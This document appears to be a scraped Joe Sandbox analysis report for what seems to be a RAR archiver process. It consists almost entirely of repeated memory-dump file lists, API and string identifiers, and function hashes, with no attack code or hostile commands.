• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: CloseCreateEventHandle$ErrorLast
• String ID: rar -ioff
• API String ID: 4151682896-4089728129
• Opcode ID: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
• Instruction ID: 3538cf37bccc810530778cad8212ab69147ffa62d04ffdd3317db0d7976d8142
• Opcode Fuzzy Hash: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
• Instruction Fuzzy Hash: BD016D24A1AA47C6FB1DDFB8E9546392371BF4C706F544A31DB0E862B0CF3CA0488644
APIs
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
• API String ID: 667068680-1824683568
• Opcode ID: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
• Instruction ID: 3d4a43fbdc51cd9b975287ed98888777bd79b89074c31b53e0b531c86090eb4d
• Opcode Fuzzy Hash: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
• Instruction Fuzzy Hash: C9F03C25A09B8682EE08DF19F9540792760BF4DBC0B489630DE1E87734EF3CE449C304
APIs
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: +$-
• API String ID: 3215553584-2137968064
• Opcode ID: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
• Instruction ID: 8c60fd6d17ef8d80984c62469d34be7fb4f331d9c50f0b9c1cd0e6b7c24c77d0
• Opcode Fuzzy Hash: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
• Instruction Fuzzy Hash: 2A129E2AE0D5A385FB28DA5D90442B86696FB48764FCC4332D79EC36E0DF2DE691C305
APIs
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: Backup$Read$Seek$wcschr
• String ID:
• API String ID: 2092471728-0
• Opcode ID: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
• Instruction ID: 2a31fd158eaedfcd40b4760ff1498567ffa4125a20ba02da26ba3b7e0b2f551f
• Opcode Fuzzy Hash: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
• Instruction Fuzzy Hash: 3F51883261878686EB20CF19E44416A77B4FB99B94F500235EB9D83BE8DF3CE555CB40
APIs
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: Time$File$System$Local$SpecificVersion
• String ID:
• API String ID: 2092733347-0
• Opcode ID: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
• Instruction ID: 9581bb66e227cacf2f2e903ba352a93f7bfdc0bb416d73c053c3257d9aa0bd1c
• Opcode Fuzzy Hash: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
• Instruction Fuzzy Hash: 9C5126B2B146558EEB58CFB8D4445AC37B1FB08B88B60413ADF0E96B68EF38D555CB00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2092733347-0
                                                                                                                                                                                                                              • Opcode ID: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                                                                                                                                                                                              • Instruction ID: 1308b37c48b12b00fb61ad290d4c91ecb9d03de8f13a9e1bd2ced52c64f87d5e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36313662B14A518EEB04CFB8D8901BD3770FF08B48B54552AEF0EA7A68EF38D495C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: exe$rar$rebuilt.$sfx
                                                                                                                                                                                                                              • API String ID: 0-13699710
                                                                                                                                                                                                                              • Opcode ID: 969fda4f40c314800319598d7d1b53e9821355c5f20c2078fec8c7b385f8f9f5
                                                                                                                                                                                                                              • Instruction ID: 7fc7fbfd2bd8504474140b25f10b243f2d76bfbfeaa054cf6f1df69d3f26b52f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 969fda4f40c314800319598d7d1b53e9821355c5f20c2078fec8c7b385f8f9f5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32818421A186C385EA74DB69D41A2FD27A2FB89384F404131DB5D8BAEADF2DF605C740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentImageNonwritableUnwindabort
                                                                                                                                                                                                                              • String ID: csm$f
                                                                                                                                                                                                                              • API String ID: 3913153233-629598281
                                                                                                                                                                                                                              • Opcode ID: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                                                                                                                                                                                              • Instruction ID: 52c95058cb01aa9aabb46ecdc49671b5145a384809bb253792a91387449d4e2b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E619036E0964287EB1CDB29E454A793791FB4CB94F948638DF1A877A8DF7CE8418700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Security$File$DescriptorLength
                                                                                                                                                                                                                              • String ID: $ACL
                                                                                                                                                                                                                              • API String ID: 2361174398-1852320022
                                                                                                                                                                                                                              • Opcode ID: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                                                                                                                                                                                              • Instruction ID: c6dfac94ff5804725e1c4807196d371a1fb3b2bfe3b39fae5f74b6d9e29c28de
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0318061B09A8292EB24DB15E4543EA63B4FB9C784F804135EB8DC3BA6DF3CE615C740
APIs
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: AddressCompareHandleModuleOrdinalProcStringVersion
• String ID: CompareStringOrdinal$kernel32.dll
• API String ID: 2522007465-2120454788
APIs
Strings
Similarity
• API ID: Time$File$swprintf$LocalSystem
• String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
• API String ID: 1364621626-1794493780
APIs
Strings
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
• String ID:
• API String ID: 3659116390-0
APIs
Similarity
• API ID: CharHandleWrite$ByteConsoleFileMultiWide
• String ID:
• API String ID: 643171463-0
APIs
Similarity
• API ID: AddressProc
• String ID:
• API String ID: 190572456-0
APIs
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
APIs
Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: wcschr$BeepMessage
• String ID: ($[%c]%ls
• API String ID: 1408639281-228076469
• Opcode ID: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
• Instruction ID: b98109206662da3e30741508137960e2537004297d074cc061220da40dcf8269
• Opcode Fuzzy Hash: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
• Instruction Fuzzy Hash: 5181C522A08A8186EB64CF19E4442BA67B5FB9CB88F540136EF4E97779DF3CE541C740
APIs
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: swprintf
• String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
• API String ID: 233258989-622958660
• Opcode ID: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
• Instruction ID: d909fecc7851ffad67156ebedf033f028d2ddc17d31c9551f6d41b7d02da30df
• Opcode Fuzzy Hash: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
• Instruction Fuzzy Hash: 27515DF3F785448AE3548F1CF841BA96660F368B91F545A25F65AD3B94CB3DDA048700
APIs
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: wcschr
• String ID: MCAOmcao$MCAOmcao
• API String ID: 1497570035-1725859250
• Opcode ID: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
• Instruction ID: 660faceb1a673d184fc58643e95e2965d0a385903c3c99a8ac5d85b25efe3be6
• Opcode Fuzzy Hash: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
• Instruction Fuzzy Hash: D841C512E0C58380F660DB2882596BE5671BF3CB84F684076DB4DC62F6EF3DE45583A1
APIs
• GetCurrentProcessId.KERNEL32 ref: 00007FF6BBCD359E
• swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6BBCD35E6
  • Part of subcall function 00007FF6BBCD30C8: GetFileAttributesW.KERNELBASE(00000800,00007FF6BBCD305D,?,?,?,?,?,?,?,?,00007FF6BBCE4126,?,?,?,?,00000800), ref: 00007FF6BBCD30F0
  • Part of subcall function 00007FF6BBCD30C8: GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF6BBCE4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF6BBCD3119
• swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6BBCD3651
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: AttributesFileswprintf$CurrentProcess
• String ID: %u.%03u
• API String ID: 2814246642-1114938957
• Opcode ID: 84c97cd936c0b2bb546c7914bc35e6a0bad55efb9bf4e2a2824d38ff43805cc4
• Instruction ID: 002b90437dbce2740dfb7ab84031ff274a97dfb466e1b8b16df87d20b2928bf4
• Opcode Fuzzy Hash: 84c97cd936c0b2bb546c7914bc35e6a0bad55efb9bf4e2a2824d38ff43805cc4
• Instruction Fuzzy Hash: FF314565618A8542EA18DB2CF4152AAA270BB8C7B4F501331EB7E87BF1DF3CE546C300
APIs
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: ByteCharErrorFileLastMultiWideWrite
• String ID: U
• API String ID: 2456169464-4171548499
• Opcode ID: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
• Instruction ID: e0011f97e5095b9fb848167e1f8b335a63f731dfe014ace255cf0a6c71d33555
• Opcode Fuzzy Hash: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
• Instruction Fuzzy Hash: 7A41BF62B18A9586EB248F29E8443BAB7A1FB88784F854231EF4D877A4DF3CD445C740
APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
